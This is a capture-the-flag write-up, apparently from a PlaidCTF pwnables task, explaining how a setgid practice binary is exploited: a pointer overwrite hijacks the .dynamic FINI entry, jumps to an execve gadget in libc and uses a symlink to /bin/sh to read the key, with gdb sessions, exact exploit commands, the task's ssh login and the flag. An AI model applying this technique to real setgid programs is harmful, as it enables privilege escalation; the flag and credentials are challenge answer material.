Category: pwnables
It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!
ssh username@a5.amalgamated.bizUsername: exp_1
Password: jNKpzFuRLpsIW9xzqNIpCVF1
Summary: .dynamic->FINI overwriting, execl symlink
This is the only function of the program (main only does atoi of 2nd and 3rd arguments):
void __cdecl sub_8048575(const char *argv1, int argv2atoi, size_t argv3atoi) { char v3; // [sp+10h] [bp-5Ch]@2 size_t v4; // [sp+50h] [bp-1Ch]@2 if ( argv3atoi <= 71 ) { v4 = argv3atoi; strncpy(&v3, argv1, argv3atoi); if ( v4 ) *v4 = argv2atoi; exit(0); } }
Ok, we can overwrite v4 variable, and, because it’s used as a pointer, we can overwrite arbitrary address. What we should overwrite? One my tool showed that dtors are a bad case, but luckily, .dynamic->FINI is ok:
exploitme $ elfinfo exploitme Info for 'exploitme': i DYNAMIC SECTION: 0x80496f4 RW + DYNAMIC most probably IS writeable at runtime i FINI: 0x8049708 - STACK IS NOT executable i DTORS 0x80496e8 WA, next 0x80496ec [ffffffff00000000] - DTORS are not working, bad style found
So, we will overwrite 0x8049708 to whatever-we-want. Let’s put there smth and look what arguments are passed:
exp_1@a5:~$ ulimit -s unlimited # disable libc ASLR
exp_1@a5:~$ gdb --args /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x41424344'`" 71 (gdb) r Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) x/20xw $esp 0xbfefbcbc: 0x4000e226 0x4001c4e4 0x00000000 0x00000000 (gdb) x/1s 0x4001c4e4 0x4001c4e4 <_rtld_global+1220>: ""
Oh no, empty string :( Luckily, there are lot of gadgets calling execve in libc, and I found an appropriate one:
(gdb) x/2i &execl-12 0x400bcb54 <execle+324>: mov %eax,(%esp) 0x400bcb57 <execle+327>: call 0x400bc870 <execve> (gdb) p/x $eax $1 = 0x41424344 (gdb) x/1s &execl-12 0x400bcb54 <execle+324>: "\211\004$\350\024\375\377\377뇐\220UW VS\201\354\030\020"
Ok, now we just create a symlink to /bin/sh (No arguments are passed to him, so no wrapper is needed), and run an exploit:
exp_1@a5:~$ ln -s /bin/sh $'\211\004$\350\024\375\377\377뇐\220UW VS\201\354\030\020' exp_1@a5:~$ /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x400bcb54'`" 71 $ id uid=6001(exp_1) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers) $ cat /opt/pctf/exploit/key K3Ys_t0_15_M1nUtEs_0f_F4mE
The flag: K3Ys_t0_15_M1nUtEs_0f_F4mE
2 comments
Большое спасибо за разбор эксплоитов =)
Расскажите пожалуйста о решении тасков: 2 (Mystery Puzzle 9000), 30 (Sticky Note) и 36 (I’M HUNGRY!..as hell).
В 2 и 30 у нас был полный фэил с распознаванием, ничего не берёт. А в 36 проблемы, видимо, со слухом. Получили 3х секундную музычку, но разобрать что там поется как-то не получилось, что-то вроде “fuck you ever fuck fuck you”, но система это за ответ есть не стала.
awesome write up !